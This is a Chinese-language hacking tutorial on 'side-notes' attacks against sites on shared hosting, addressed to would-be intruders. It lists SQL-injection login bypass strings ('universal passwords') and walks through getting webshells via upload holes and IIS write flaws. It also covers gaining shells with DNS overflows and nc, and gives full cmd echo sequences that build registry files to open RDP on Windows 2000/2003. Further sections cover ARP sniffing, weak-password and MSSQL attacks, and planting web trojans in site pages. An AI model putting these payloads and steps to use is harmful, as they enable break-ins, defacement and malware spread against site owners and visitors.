旁注是互联网黑客入侵常见的一种手段,多数用来攻击虚拟主机。其原理是利用统一主机上其他站点的安全漏洞获取服务器上的一个WEBshell,从而获得一定的操作权限,进而利用虚拟目录权限的配置不严格或者通过“提权”来获取管理员权限后在跳转到目标网站的web虚拟目录中。
由于现在互联网的发展,使更多的人都拥有自己的网站。但是如果自己买服务器,买带宽的话就会花费很多钱,这样长久下去的资金开销不是一般人可以付的起的。所以虚拟机出现了,可以使用一台服务器同时可以搭建多个网站站,这就是现在的服务器合租。虽然便宜了,但是安全性下降了。
比如我们要入侵的网站是A,但是它的安全做的相当的好。比如说,全部采用静态的页面,后台也找不到。这时就应该想到旁注。通过利用工具来查询这个网站的IP所绑定的域名。如明小子,啊D等。如果这个网站绑定的域名越多,那么它的安全性也就越低。比如经过我们查询,A的站点所在的IP所绑定的域名有100多个,那么现在我们可以利用明小子的批量扫描。先扫他的上传页面。(如果一个网站返回的上传页面有N多,那么很有可能全是假的,后台也同样)扫到上传页面之后,看看存在上传漏洞吗?如果存在,就利用相应的工具去搞WEBSHELL。还有我们也可以扫后台,如果他的后台没有验证码的话,很有可能可以利用万能密码(一个可以连接SQL的语名句.可以直接进入后台)进入,下面给大家几个万能密码:
-
admin
'or'1'='1'--
-
-
’
or’=’
or’
-
-
’
or’’=’
-
-
" or "a
"="a
-
-
’)
or (’a’=’a
-
-
or
1=
1-- ’
-
-
or ’a’=’a
我们也可以利用admin这个若口令进入后台,再去找上传或备份拿WEBSHELL。如果这些都不行的话,只有扫描注入点,然后进后台去拿WEBSHELL。如果注入点是MSSQL的话,权限是DB以上的话,嘿嘿,你已经离成功已经一半了。有注入点的话,可以先列目录,找到站点的目录,然后找个可写的目录,如IMG UPLOAD PIC等。知道这些信息之后,我们可以利用GET WEBSHELL拿WEBSHELL。如果还不行,那么看看他的版权信息,利用GOOGLE或Baidu去搜索他的漏洞,看看有没有高手写的程序。拿到了WEBSHELL,可以利用目录跳转来达到你的目的,如果禁止了的话,试试访问一下以你要搞的那个站域名命名的文件夹。如果要挂马,可以先打开那个站,点右键,查看原文件,然后复制到本地。插入你的网马地址进行挂马,然后上传回去覆盖掉原来的(如果要修改首页,建议用同样的方法备份一下首页,以免带来不便)。
(1)在局域网中的入侵,我们必须拿到一台服务器的Administrator的权限,然后利用Cain来进行Sniffer和ARP,来搞我们想要的站点。
A、最好的拿Webshell的方法就是那个IIS写权限漏洞。利用扫描软件扫描存在漏洞的主机,然后用老兵的利用工具,先PUT再MOVE,如果成功那么就拿到了一个WEBSHELL(可以用一句话,然后用客户端连接)。
(2)利用DNS溢出。
首先,扫描我们要入侵那个站的的D段IP,也就是在同一内网里的。扫描的端口是53。利用工具去溢出。然后用NC连接所提示的端口。到此我们就获得了个CMDSHELL。然后是加用户或传木马。这里我给出2000和2003的开3389的方法。
2000开3389之后,必须重起才能生效。这里给出开3389的方法,自己想办法重起。
在CMD下输入:
-
echo Windows Registry Editor Version
5.00 >
3389.reg
-
-
echo.
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
>>
3389.reg
-
-
echo
"Enabled"=
"0"
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
>>
3389.reg
-
-
echo
"ShutdownWithoutLogon"=
"0"
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>
3389.reg
-
-
echo
"EnableAdminTSRemote"=
dword:
00000001
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>
3389.reg
-
-
echo
"TSEnabled"=
dword:
00000001
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
>>
3389.reg
-
-
echo
"Start"=
dword:
00000002
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>
3389.reg
-
-
echo
"Start"=
dword:
00000002
>>
3389.reg
-
-
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
>>
3389.reg
-
-
echo
"Hotkey"=
"1"
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
>>
3389.reg
-
-
echo
"PortNumber"=
dword:
00000D3D
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
>>
3389.reg
-
-
echo
"PortNumber"=
dword:
00000D3D
>>
3389.reg
下面我再来介绍2003下开3389的方法:
-
echo Windows Registry Editor Version
5.00 >
3389.reg
-
-
echo.
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>
3389.reg
-
-
echo
"fDenyTSConnections"=
dword:
00000000
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
>>
3389.reg
-
-
echo
"PortNumber"=
dword:
00000d3d
>>
3389.reg
-
-
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
>>
3389.reg
-
-
echo
"PortNumber"=
dword:
00000d3d
>>
3389.reg
2003开3389不用重起。以上的方法来自网络,我没有测试。如果不行,也可以用开3389的工具。(以上两种方法要在DOS下,用注册表编辑器导入)
如果开启了3389,并且成功的连接上去,我们可以用CAIN来ARP和SNIFFER
先用扫描工具扫描1433这个端口,然后用X-SCAN来扫描刚才扫出来的结果,只扫描MSSQL那一向。如果是SA并且没有删除CMD扩展的话。我们可以像上面那样入侵主机。
还有一种方法,扫描开放21端口的主机。如果存在的是最高权限的弱口令,我们可以想上面一样。如果权限低的话,就先上传个WEBSHELL,然后提权。
关于提权
关于提权的文章太多了,我就懒得写了,所以就从网上转了一篇。
https://wenku.baidu.com/view/9831c4bef121dd36a32d8213.html